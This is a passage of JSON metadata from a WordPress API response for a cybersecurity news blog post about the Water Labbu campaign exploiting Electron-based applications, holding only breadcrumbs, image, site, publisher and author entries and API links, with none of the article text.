News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/10\/how-water-labbu-exploits-electron-based-applications.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/10\/how-water-labbu-exploits-electron-based-applications.png","width":641,"height":350},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : APT&amp;Targeted Attacks","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-apttargeted-attacks\/"},{"@type":"ListItem","position":3,"name":"How Water Labbu Exploits Electron-Based Applications"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/48745","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=48745"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/48745\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/48746"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=48745"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=48745"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=48745"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}